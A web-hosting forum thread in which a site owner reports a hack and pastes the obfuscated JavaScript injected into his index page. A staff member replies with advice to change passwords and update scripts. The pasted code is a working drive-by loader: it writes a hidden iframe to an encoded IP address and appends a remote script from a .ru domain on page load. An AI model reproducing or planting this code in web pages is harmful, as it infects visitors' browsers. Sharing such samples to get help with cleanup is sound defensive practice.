Site Hacked

Status
Not open for further replies.

cenobite321

Member
Messages
77
Reaction score
0
Points
6
Today I visited my website (clubdoom.pcriot.com) and the browser showed a warning of being an untrusted site. I entered to the CPanel account and opened the index file and it showed this:

Code:
   <body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script>
		<?php
			echo 'Hello ';
		?>
    </body>
</html>
<script>this.K=60680;this.K+=224;try {var xL='Nj'} catch(xL){};this.z=37516;this.z++;var W;R=function(){try {} catch(Aj){};this.fQ=28202;this.fQ-=1;function p(n,l,N){var C="C";return n.substr(l,N);this.q="q";}var P=["wM"];var HS=false;var w=String("/goo"+"gle."+p("com/dJBs",0,4)+p("hyvex6L3",0,4)+p("s.nlI7BH",0,4)+p("S5L/chiL5S",3,4)+p("R8up.deR8u",3,4)+p("JUg.phpUJg",3,4));ol=[];var pI=RegExp;r=["ld","lj","Or"];var G={};var f='';this.xH="xH";var Wc=document;this.T="";VN=["h"];var Xh=["Fi","NW"];function x(n,l){var fn={};var Uc=[];var N=String("[")+l+"]";var xQ=["xr","YH"];var H=new pI(N, p("gL4M",0,1));return n.replace(H, f);};var eW={XLk:"Jc"};var Jp="";this.Ez=18617;this.Ez++;Kc=6566;Kc++;var Y=298491-290411;var k={I:false};var F=String("bo"+"dy");this.Zk=13098;this.Zk++;var Qu="Qu";var Rp=x('sBcJrSiJpXtF','fXJFMBS');try {} catch(IZ){};try {} catch(Wt){};var M=null;try {var CN='j'} catch(CN){};var Qr={bt:"Fz"};SA=29290;SA--;this.JP='';W=function(){try {var L=x('cNr8e8a9tNe8ENl2e8myefn9tf','J_2GfT8HNzu9y');oe=41112;oe--;Rd=38082;Rd--;Z=Wc[L](Rp);var iE={DL:false};var g=x('sDrDcK','LFlbg7DK');var aG="aG";oY={Fu:14447};zB={pr:9065};var t=new String("def"+p("er8ID",0,2));Ih=29848;Ih++;var n=Y+w;try {} catch(ac){};var GW=new Array();try {var Oj='eP'} catch(Oj){};Z[t]=[5,1][1];var kN=["YHn","Xg"];var Fun={iU:false};Z[g]=new String("http:"+"//mon"+p("dayriD46",0,5)+"ng.ru"+p("9rQO:Or9Q",4,1))+n;qQ=47990;qQ-=62;this.jp=60422;this.jp--;this.sM="sM";hW=63752;hW--;Wc[F].appendChild(Z);} catch(B){this.Id=41689;this.Id--;try {var dp='pd'} catch(dp){};var kh='';n_={};};};var ge=new Date();};R();try {var Hn='Vh'} catch(Hn){};try {var jB='MX'} catch(jB){};Fid={Yz:false};this.WV=12097;this.WV++;window.onload=W;var eI={};this.As=7216;this.As-=46;</script>
<!--a700ac5d704d3c34b705441133e392f9-->

Somebody, somehow inserted this chunk of javascript code in the index file. I haven't checked the rest of the files in the site but seems that somebody knows the way around to access the server. I ask you what do you recommend me to do in order to prevent this? I tried to access the logs but they don't show anything for some reason.

Thanks.
 

Anna

I am just me
Staff member
Messages
11,733
Reaction score
578
Points
113
First step is changing your password, both for cPanel in case that is how they got in, and for admin pages of your site if there are any. If you have more admins, make sure they change as well.

Next step is to make sure the scripts you have are up to date to make sure there are no security holes.
 
Status
Not open for further replies.
Top